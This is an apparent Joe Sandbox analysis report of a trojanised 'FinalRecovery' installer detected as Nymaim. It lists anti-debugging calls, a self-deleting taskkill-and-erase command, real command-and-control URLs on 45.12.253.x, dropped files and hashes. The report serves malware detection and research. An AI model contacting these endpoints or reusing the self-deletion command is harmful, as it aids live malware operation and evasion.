Source: finalrecovery.exe, 00000002.00000002.323596544.000000000168A000.00000004.00000020.00020000.00000000.sdmp, finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: Hyper-V RAW
Source: finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	Binary or memory string: \??\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,

2_2_004132EB

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00402C00 VirtualProtect,GetLastError,FormatMessageA,LocalAlloc,OutputDebugStringA,LocalFree,LocalFree,LocalFree,

2_2_00402C00

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

1_2_0044AC90

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_00402F20 SetLastError,SetLastError,SetLastError,GetNativeSystemInfo,VirtualAlloc,VirtualAlloc,VirtualAlloc,GetProcessHeap,HeapAlloc,VirtualFree,SetLastError,VirtualAlloc,

2_2_00402F20

Source: C:\Windows\SysWOW64\taskkill.exe

Process token adjusted: Debug

Jump to behavior

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0044028F mov eax, dword ptr fs:[00000030h]	2_2_0044028F
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0042039F mov eax, dword ptr fs:[00000030h]	2_2_0042039F
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004429E7 mov eax, dword ptr fs:[00000030h]	2_2_004429E7
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_00417B2F mov eax, dword ptr fs:[00000030h]	2_2_00417B2F
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10007A06 mov eax, dword ptr fs:[00000030h]	2_2_10007A06
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10005EB5 mov eax, dword ptr fs:[00000030h]	2_2_10005EB5

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040F709 SetUnhandledExceptionFilter,	2_2_0040F709
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_004132EB IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_004132EB
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040F575 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_0040F575
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_0040EB52 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_0040EB52
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10005630 IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_10005630
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10002A85 SetUnhandledExceptionFilter,UnhandledExceptionFilter,GetCurrentProcess,TerminateProcess,	2_2_10002A85
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: 2_2_10002F80 IsProcessorFeaturePresent,IsDebuggerPresent,SetUnhandledExceptionFilter,UnhandledExceptionFilter,	2_2_10002F80

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_00476C24 ShellExecuteEx,GetLastError,MsgWaitForMultipleObjects,GetExitCodeProcess,CloseHandle,

1_2_00476C24

Source: C:\Windows\SysWOW64\cmd.exe

Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f

Jump to behavior

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Process created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /c taskkill /im "finalrecovery.exe" /f & erase "C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe" & exit			Jump to behavior
Source: C:\Windows\SysWOW64\cmd.exe	Process created: C:\Windows\SysWOW64\taskkill.exe taskkill /im "finalrecovery.exe" /f			Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_0042DF9C AllocateAndInitializeSid,GetVersion,GetModuleHandleA,GetProcAddress,CheckTokenMembership,GetCurrentThread,OpenThreadToken,GetLastError,GetCurrentProcess,OpenProcessToken,GetTokenInformation,GetLastError,GetTokenInformation,EqualSid,CloseHandle,FreeSid,

1_2_0042DF9C

Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	0_2_004051D4
Source: C:\Users\user\Desktop\file.exe	Code function: GetLocaleInfoA,	0_2_00405220
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: GetLocaleInfoA,	1_2_00408548
Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	Code function: GetLocaleInfoA,	1_2_00408594
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetKeyboardLayoutList,GetLocaleInfoA,__Init_thread_footer,	2_2_00404D40
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,	2_2_0042700C
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,	2_2_004270A7
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetLocaleInfoW,	2_2_00427132
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,	2_2_0041E27F
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,	2_2_00427385
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,GetLocaleInfoW,GetACP,	2_2_004274AB
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,	2_2_004275B1
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetUserDefaultLCID,IsValidCodePage,IsValidLocale,GetLocaleInfoW,GetLocaleInfoW,	2_2_00427680
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetLocaleInfoW,	2_2_0041E7A1
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: GetACP,IsValidCodePage,_wcschr,_wcschr,GetLocaleInfoW,	2_2_00426D1F
Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	Code function: EnumSystemLocalesW,	2_2_00426FC1

Source: C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe

Code function: 2_2_0040F773 cpuid

2_2_0040F773

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_00457964 GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,

1_2_00457964

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_004026C4 GetSystemTime,

0_2_004026C4

Source: C:\Users\user\Desktop\file.exe

Code function: 0_2_00405CBC GetVersionExA,

0_2_00405CBC

Source: C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp

Code function: 1_2_004547B8 GetUserNameA,

1_2_004547B8

Stealing of Sensitive Information

Yara detected Nymaim

Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.3250000.2.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.3250000.2.unpack, type: UNPACKEDPE
Source: Yara match	File source: 2.2.finalrecovery.exe.400000.1.raw.unpack, type: UNPACKEDPE
Source: Yara match	File source: 00000002.00000002.323772698.0000000003250000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: Yara match	File source: 00000002.00000002.323409231.0000000000400000.00000040.00000001.01000000.00000007.sdmp, type: MEMORY

Mitre Att&ck Matrix

Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Exfiltration	Command and Control	Network Effects	Remote Service Effects	Impact
Valid Accounts	1 Windows Management Instrumentation	Path Interception	1 Exploitation for Privilege Escalation	1 Disable or Modify Tools	1 Input Capture	1 System Time Discovery	Remote Services	1 Archive Collected Data	Exfiltration Over Other Network Medium	2 Ingress Tool Transfer	Eavesdrop on Insecure Network Communication	Remotely Track Device Without Authorization	1 System Shutdown/Reboot
Default Accounts	3 Native API	Boot or Logon Initialization Scripts	1 Access Token Manipulation	11 Deobfuscate/Decode Files or Information	LSASS Memory	1 Account Discovery	Remote Desktop Protocol	1 Input Capture	Exfiltration Over Bluetooth	2 Encrypted Channel	Exploit SS7 to Redirect Phone Calls/SMS	Remotely Wipe Data Without Authorization	Device Lockout
Domain Accounts	12 Command and Scripting Interpreter	Logon Script (Windows)	12 Process Injection	3 Obfuscated Files or Information	Security Account Manager	2 File and Directory Discovery	SMB/Windows Admin Shares	Data from Network Shared Drive	Automated Exfiltration	1 Non-Application Layer Protocol	Exploit SS7 to Track Device Location	Obtain Device Cloud Backups	Delete Device Data
Local Accounts	At (Windows)	Logon Script (Mac)	Logon Script (Mac)	23 Software Packing	NTDS	26 System Information Discovery	Distributed Component Object Model	Input Capture	Scheduled Transfer	11 Application Layer Protocol	SIM Card Swap		Carrier Billing Fraud
Cloud Accounts	Cron	Network Logon Script	Network Logon Script	2 Masquerading	LSA Secrets	141 Security Software Discovery	SSH	Keylogging	Data Transfer Size Limits	Fallback Channels	Manipulate Device Communication		Manipulate App Store Rankings or Ratings
Replication Through Removable Media	Launchd	Rc.common	Rc.common	1 Access Token Manipulation	Cached Domain Credentials	2 Process Discovery	VNC	GUI Input Capture	Exfiltration Over C2 Channel	Multiband Communication	Jamming or Denial of Service		Abuse Accessibility Features
External Remote Services	Scheduled Task	Startup Items	Startup Items	12 Process Injection	DCSync	11 Application Window Discovery	Windows Remote Management	Web Portal Capture	Exfiltration Over Alternative Protocol	Commonly Used Port	Rogue Wi-Fi Access Points		Data Encrypted for Impact
Drive-by Compromise	Command and Scripting Interpreter	Scheduled Task/Job	Scheduled Task/Job	Indicator Removal from Tools	Proc Filesystem	3 System Owner/User Discovery	Shared Webroot	Credential API Hooking	Exfiltration Over Symmetric Encrypted Non-C2 Protocol	Application Layer Protocol	Downgrade to Insecure Protocols		Generate Fraudulent Advertising Revenue

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

⊘No Antivirus matches

Dropped Files

Source	Detection	Scanner	Label
C:\Program Files (x86)\FgasoftFR\FinalRecovery\finalrecovery.exe	100%	Joe Sandbox ML
C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)	0%	ReversingLabs
C:\Program Files (x86)\FgasoftFR\FinalRecovery\is-RVFGU.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_RegDLL.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_iscrypt.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_setup64.tmp	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-EFH65.tmp\_isetup\_shfoldr.dll	0%	ReversingLabs
C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp	2%	ReversingLabs
C:\Users\user\AppData\Roaming\{e6e9dfa8-98f2-11e9-90ce-806e6f6e6963}\6tohc1clzbcir.exe	60%	ReversingLabs	Win32.Trojan.GenusAgent

Unpacked PE Files

Source	Detection	Scanner	Label	Download
1.2.file.tmp.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File
0.3.file.exe.23675c8.1.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
1.2.file.tmp.4b375c.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.3.file.exe.218b608.5.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
2.2.finalrecovery.exe.400000.1.unpack	100%	Avira	HEUR/AGEN.1250671	Download File
1.0.file.tmp.4b375c.2.unpack	100%	Avira	TR/Patched.Ren.Gen	Download File
0.2.file.exe.400000.0.unpack	100%	Avira	TR/Dropper.Gen	Download File

Domains

⊘No Antivirus matches

URLs

Source	Detection	Scanner	Label
http://www.innosetup.com/	0%	URL Reputation	safe
http://www.innosetup.com/	0%	URL Reputation	safe
http://45.12.253.72/default/stuk.php	0%	URL Reputation	safe
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte	0%	URL Reputation	safe
http://www.remobjects.com/psU	0%	URL Reputation	safe
http://45.12.253.72/default/puk.php	0%	URL Reputation	safe
http://45.12.253.75/dll.php	0%	URL Reputation	safe
http://www.finalrecovery.com/buy.htm	0%	URL Reputation	safe
http://www.remobjects.com/ps	0%	URL Reputation	safe
http://nbafrog.com/b	0%	Avira URL Cloud	safe
http://45.12.253.75/dll.phpI	0%	Avira URL Cloud	safe
http://45.12.253.72/default/stuk.phpE	0%	Avira URL Cloud	safe
http://nbafrog.com/.	0%	Avira URL Cloud	safe
http://45.12.253.72/default/puk.phpk	0%	Avira URL Cloud	safe
http://nbafrog.com/	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

⊘No contacted domains info

Contacted URLs

Name	Malicious	Antivirus Detection	Reputation
http://45.12.253.72/default/stuk.php	true	URL Reputation: safe	unknown
http://45.12.253.56/advertisting/plus.php?s=NOSUB&str=mixtwo&substr=mixinte	true	URL Reputation: safe	unknown
http://45.12.253.72/default/puk.php	true	URL Reputation: safe	unknown
http://45.12.253.75/dll.php	true	URL Reputation: safe	unknown

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
http://www.innosetup.com/	file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	false	URL Reputation: safe URL Reputation: safe	unknown
http://www.remobjects.com/psU	file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	false	URL Reputation: safe	unknown
http://45.12.253.75/dll.phpI	finalrecovery.exe, 00000002.00000002.323950124.000000000426A000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://45.12.253.72/default/puk.phpk	finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nbafrog.com/b	file.tmp, 00000001.00000003.324143463.0000000000782000.00000004.00000020.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324394304.0000000000782000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.finalrecovery.com/buy.htm	is-587OJ.tmp.1.dr	false	URL Reputation: safe	unknown
http://45.12.253.72/default/stuk.phpE	finalrecovery.exe, 00000002.00000002.323596544.0000000001665000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://www.remobjects.com/ps	file.exe, 00000000.00000003.242613252.00000000022C0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242766712.00000000020E8000.00000004.00001000.00020000.00000000.sdmp, file.tmp, file.tmp, 00000001.00000000.243074612.0000000000401000.00000020.00000001.01000000.00000004.sdmp, file.tmp.0.dr, is-U89TP.tmp.1.dr	false	URL Reputation: safe	unknown
http://nbafrog.com/	file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://nbafrog.com/.	file.exe, 00000000.00000003.324832803.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000003.242527892.00000000020E1000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000002.324490677.0000000002267000.00000004.00001000.00020000.00000000.sdmp, file.tmp, 00000001.00000003.243532631.0000000002278000.00000004.00001000.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown

World Map of Contacted IPs

No. of IPs < 25%
25% < No. of IPs < 50%
50% < No. of IPs < 75%
75% < No. of IPs

Public IPs

IP	Domain	Country	ASN	ASN Name	Malicious
45.12.253.72	unknown	Germany	33657	CMCSUS	true
45.12.253.75	unknown	Germany	33657	CMCSUS	true
45.12.253.98	unknown	Germany	33657	CMCSUS	true
45.12.253.56	unknown	Germany	33657	CMCSUS	true

General Information

Joe Sandbox Version:	36.0.0 Rainbow Opal
Analysis ID:	791301
Start date and time:	2023-01-25 10:01:06 +01:00
Joe Sandbox Product:	CloudBasic
Overall analysis duration:	0h 8m 4s
Hypervisor based Inspection enabled:	false
Report type:	full
Sample file name:	file.exe
Cookbook file name:	default.jbs
Analysis system description:	Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 104, IE 11, Adobe Reader DC 19, Java 8 Update 211
Number of analysed new started processes analysed:	20
Number of new started drivers analysed:	0
Number of existing processes analysed:	0
Number of existing drivers analysed:	0
Number of injected processes analysed:	0
Technologies:	HCA enabled EGA enabled HDC enabled AMSI enabled
Analysis Mode:	default
Analysis stop reason:	Timeout
Detection:	MAL
Classification:	mal92.troj.evad.winEXE@12/24@0/4
EGA Information:	Successful, ratio: 100%
HDC Information:	Successful, ratio: 38.5% (good quality ratio 37.4%) Quality average: 81.2% Quality standard deviation: 24.8%
HCA Information:	Successful, ratio: 97% Number of executed functions: 182 Number of non-executed functions: 272
Cookbook Comments:	Found application associated with file extension: .exe

Warnings

Exclude process from analysis (whitelisted): MpCmdRun.exe, audiodg.exe, SgrmBroker.exe, backgroundTaskHost.exe, conhost.exe, svchost.exe
Excluded domains from analysis (whitelisted): fs.microsoft.com, ctldl.windowsupdate.com
Not all processes where analyzed, report is missing behavior information
Report creation exceeded maximum time and may have missing disassembly code information.
Report size getting too big, too many NtOpenKeyEx calls found.
Report size getting too big, too many NtQueryValueKey calls found.

Simulations

Behavior and APIs

Time	Type	Description
10:02:03	API Interceptor	1x Sleep call for process: 6tohc1clzbcir.exe modified

Joe Sandbox View / Context

IPs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
45.12.253.72	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php
	file.exe	Get hash	malicious	Browse	45.12.253.72/default/puk.php

Domains

⊘No context

ASNs

Match	Associated Sample Name / URL	SHA 256	Detection	Link	Context
CMCSUS	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	HEUR-Trojan.Win32.Crypt.gen-e026bc9a0b7ac31a8.exe	Get hash	malicious	Browse	45.12.253.74
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
CMCSUS	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	HEUR-Trojan.Win32.Crypt.gen-e026bc9a0b7ac31a8.exe	Get hash	malicious	Browse	45.12.253.74
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56
	file.exe	Get hash	malicious	Browse	45.12.253.56

JA3 Fingerprints

⊘No context

Dropped Files

Match	Associated Sample Name / URL	SHA 256	Detection	Link
C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse
	file.exe	Get hash	malicious	Browse

Created / dropped Files

C:\Program Files (x86)\FgasoftFR\FinalRecovery\Preview.exe (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	791040
Entropy (8bit):	6.608982798504157
Encrypted:	false
SSDEEP:	24576:pvfBdvyjNf8cbMtMJjLKRfwaNSkxtkNkYzSYcj0oHyxdpVhNZFGv+56nBb/ExWyt:pBC4rTQnC1QaX4+I
MD5:	5C2FE7D4DDE65810152054F3C93C1815
SHA1:	2A19F3FAA78A5072068F7902DB19A248F11FA69B
SHA-256:	233D846FEB73A38141BDF6C813C7476FA3F66DCD3548338607F3B7CB61CAC730
SHA-512:	2C01AE918044829FC649F0775BF3FFDB417B1524B47CDABFF0C06B6382B6578A742D9C1D036090D7AD1FC3A8B7D563D28C0CDB94DE572BF883389825F73FD654
Malicious:	true
Antivirus:	Antivirus: ReversingLabs, Detection: 0%
Joe Sandbox View:	Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse Filename: file.exe, Detection: malicious, Browse
Reputation:	moderate, very likely benign file
Preview:	MZP.....................@...............................................!..L.!..This program must be run under Win32..$7........................................................................................................................................PE..L....^B*.....................\|......$.............@..............................................@...........................@...,...0..............................................................................DH...............................text...D{.......\|.................. ..`.itext..l........................... ..`.data...l8.......:..................@....bss.....C...............................idata...,...@......................@....tls....4....p...........................rdata..............................@..@.reloc..............................@..B.rsrc........0......................@..@....................................@..@................................................................................................

C:\Program Files (x86)\FgasoftFR\FinalRecovery\Readme.txt (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1949
Entropy (8bit):	4.915453283427292
Encrypted:	false
SSDEEP:	48:Sik3C0nGTAFE3blB/aMO0Mk2fLXVn7K+eq9hb6Suf:pkvGTAFELlB/A4GXVnWU9BNuf
MD5:	C0AE85DB30FE9027DBBF3BA758FA78BE
SHA1:	95E69DB95504A9F61D090690F32FB5D2F685C604
SHA-256:	CF63BBFD735C18757AC2AA6CB8A14C82745B6158F9FD299BD189D9CA3E7A2DE7
SHA-512:	DA53177074E79F96C1C7E477E0E7B63CD1D2B836DB9E8066F20B60897FC5770D2B16594A84A953A9CD56BD4C0DDB7D5EFBDDF881EEA840D6B106552C5AC6815E
Malicious:	false
Reputation:	moderate, very likely benign file
Preview:	.. F i n a l R e c o v e r y v3.0.7.0325....Overview ..========....FinalRecovery is a powerful and easy-to-use file recovery software. It is suitable ..for various data recovery situations. Some of those situations are listed below. ....1 Recover accidentally deleted files (files were deleted by using windows explorer, .. command line, other software utilities; files which lost while empting recycle .. bin; file losses which caused by unknown reasons); ..2 Recover files from accidentally formatted disk volume; ..3 Recover files from lost partitions (the cases may be partition deletion, disk .. repartitioning, partition losses which caused by virus or other reasons) or .. corruptted partitions; ..4 Recover files from drive image files; ..5 Predict drive failures (doesn't support SCSI hard drives, removable hard drives). ....FinalRecovery supports FAT12, FAT16, FAT32, NTFS, NTFS5 and Raw file system. It can ..recover files from hard disks, floppies, U disks, PCMCIA-

C:\Program Files (x86)\FgasoftFR\FinalRecovery\data\Config.xml (copy)

Download File

Process:	C:\Users\user\AppData\Local\Temp\is-HGAMR.tmp\file.tmp
File Type:	XML 1.0 document, ASCII text, with very long lines (5978), with CRLF line terminators
Category:	dropped
Size (bytes):	6452
Entropy (8bit):	4.734154041089812
Encrypted:	false
SSDEEP:	96:EonMpdbxw/+9MjLKJ9+LsxS/wV2iderMRyLjQ1WsL+9w/SxEDz8bONAPujBUTjkv:E7nb
MD5:	247D3A0C3B0C53CA33D032A561619495
SHA1:	F30570C48749FE427FACCBDF925048B149D22460
SHA-256:	783AC8FBA1DD88291A4F331EC2459DDE4005CF70FAFB4F19F9061713FFD580EB
SHA-512:	9D18FDC8A32C86A0F8C2BB408A33A71645632289CA0D684B58B98862AA1A67E75258D39C621F4E647753A1480D50444756D125C273B16323A757270CD94B7BBD
Malicious:	false
